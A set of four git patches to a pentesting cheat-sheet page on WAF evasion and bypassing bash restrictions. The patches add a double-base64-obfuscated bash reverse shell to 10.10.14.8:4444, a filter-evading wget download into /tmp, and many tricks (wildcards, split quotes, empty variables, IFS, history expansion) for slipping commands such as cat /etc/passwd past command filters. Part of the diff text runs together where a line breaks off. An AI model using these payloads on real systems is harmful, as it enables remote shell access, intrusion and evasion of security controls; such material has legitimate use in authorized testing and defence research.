From 7260cada202a6647ff0205f5bbf5484f4acdd87e Mon Sep 17 00:00:00 2001
From: unKn0wnUser453 <61127067+unKn0wnUser453@users.noreply.github.com>
Date: Tue, 16 Feb 2021 17:44:45 -0500
Subject: [PATCH 1/4] Update bypass-bash-restrictions.md
Add additional tricks, cleanup some things, spell-check, etc.
---
 .../bypass-bash-restrictions.md | 112 +++++++++---------
 1 file changed, 58 insertions(+), 54 deletions(-)
diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
index 40e801a5..688dba62 100644
--- a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
@@ -1,88 +1,92 @@ -# Bypass Bash Restrictions +# WAF Evasion / Bypass Bash Restrictions +## Reverse Shell +```sh +# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time +echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|base''64 -d|base''64 -d|b''a''s''h;" | sed 's/ /${IFS}/g' +echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|base''64${IFS}-d|base''64${IFS}-d|b''a''s''h; +``` ## Bypass Paths and forbidden commands +```sh +# Question mark binary substitution +/usr/bin/p?ng # /usr/bin/ping +nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost -```bash -#Bash substitudes * fror any possible chat tha refers to a binary in the folder -/usr/bin/p?ng #This equals /usr/bin/ping +# Wildcard(*) binary substitution +/usr/bin/who*mi # /usr/bin/whoami -#Bash substitudes * fror any compatible combination with a binary in the folder -/usr/bin/who*mi #This equals /usr/bin/whoami +# Wildcard + local directory arguments +touch -- -la # -- stops processing options after the -- +ls * -#[chars] -/usr/bin/n[c] #/usr/bin/nc +# [chars] +/usr/bin/n[c] # /usr/bin/nc -#Concatenatipn -'p'i'n'g #Equals to call ping -"w"h"o"a"m"i -\u\n\a\m\e \-\a +# Quotes / Concatenation +'p'i'n'g # ping +"w"h"o"a"m"i # whoami +\u\n\a\m\e \-\a # uname -a +ech''o test # echo test +ech""o test # echo test +bas''e64 # base64 -#Uninitialized variables: A uninitialized variable equals to null (nothing) -p${u}i${u}n${u}g #Equals to ping, use {} to put the uninitialized variables between valid characteres -cat$u /etc$u/passwd$u #Use the uninitilized variable without {} before any symbol +# Uninitialized variables: A uninitialized variable equals to null (nothing) +cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol +p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters -#Fake commands -p$(u)i$(u)n$(u)g #Equals to ping but 3 errors trying to 
exeute "u" are shown -w`u`h`u`o`u`a`u`m`u`i #Equals to whoami but 5 errors trying to exeute "u" are shown - -#Concating strings using history -!-1 #This will be substitude by the last command executed, and !-2 by the penultimate command -mi #This will throw an error -whoa #This will throw an error -!-1!-2 #This will execute whoami +# Fake commands +p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown +w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown +# Concatenation of strings using history +!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command +mi # This will throw an error +whoa # This will throw an error +!-1!-2 # This will execute whoami ``` ## Bypass forbidden spaces +```sh +# {form} +{cat,lol.txt} # cat lol.txt +{echo,test} # echo test -```bash -##{form} -{cat,lol.txt} #This will cat the file +## IFS - Internal field separator, change " " for any other character ("]" in this case) +cat${IFS}/etc/passwd # cat /etc/passwd +cat$IFS/etc/passwd # cat /etc/passwd -##IFS - Internal field separator, change " " for any othe character ("]" in this case) -#IFS withut modifications -cat${IFS}/etc/passwd -cat$IFS/etc/passwd - -#Put the command line in a variable and then execute it +# Put the command line in a variable and then execute it IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b -IFS=];b=cat]/etc/passwd;$b #Using 2 ";" -IFS=,;`cat<< Date: Tue, 16 Feb 2021 18:01:17 -0500 Subject: [PATCH 2/4] Update bypass-bash-restrictions.md Add IFS / form --- .../useful-linux-commands/bypass-bash-restrictions.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md index 688dba62..ac1c942a 100644 --- a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md +++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md 
@@ -3,8 +3,10 @@ ## Reverse Shell
 ```sh
 # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
-echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|base''64 -d|base''64 -d|b''a''s''h;" | sed 's/ /${IFS}/g'
-echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|base''64${IFS}-d|base''64${IFS}-d|b''a''s''h;
+echo "ec``ho $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
+#ec``ho${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
+echo "{ec``ho $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h}" | sed 's/ /,/g'
+#{ec``ho,WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4,-''d|ba''se''64,-''d|b''a''s''h}
 ```
 ## Bypass Paths and forbidden commands
 ```sh
From 1502d9771afc89d81c697756a6f1bdcb46dd9434 Mon Sep 17 00:00:00 2001
From: unKn0wnUser453 <61127067+unKn0wnUser453@users.noreply.github.com>
Date: Tue, 16 Feb 2021 18:10:55 -0500
Subject: [PATCH 3/4] Update bypass-bash-restrictions.md
Nevermind doesn't work
---
 linux-unix/useful-linux-commands/bypass-bash-restrictions.md | 2 --
 1 file changed, 2 deletions(-)
diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
index ac1c942a..14f2c56d 100644
--- a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
@@ -5,8 +5,6 @@ # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
 echo "ec``ho $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
 #ec``ho${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
-echo "{ec``ho $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h}" | sed 's/ /,/g'
-#{ec``ho,WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4,-''d|ba''se''64,-''d|b''a''s''h}
 ```
 ## Bypass Paths and forbidden commands
 ```sh
From 2ddb44301cd8743ac601a0a395f537bb17c9fe71 Mon Sep 17 00:00:00 2001
From: unKn0wnUser453 <61127067+unKn0wnUser453@users.noreply.github.com>
Date: Tue, 16 Feb 2021 18:15:57 -0500
Subject: [PATCH 4/4] Update bypass-bash-restrictions.md
---
 linux-unix/useful-linux-commands/bypass-bash-restrictions.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
index 14f2c56d..0a63a7a6 100644
--- a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
@@ -3,8 +3,8 @@ ## Reverse Shell
 ```sh
 # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
-echo "ec``ho $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
-#ec``ho${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
+echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
+#echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
 ```
 ## Bypass Paths and forbidden commands
 ```sh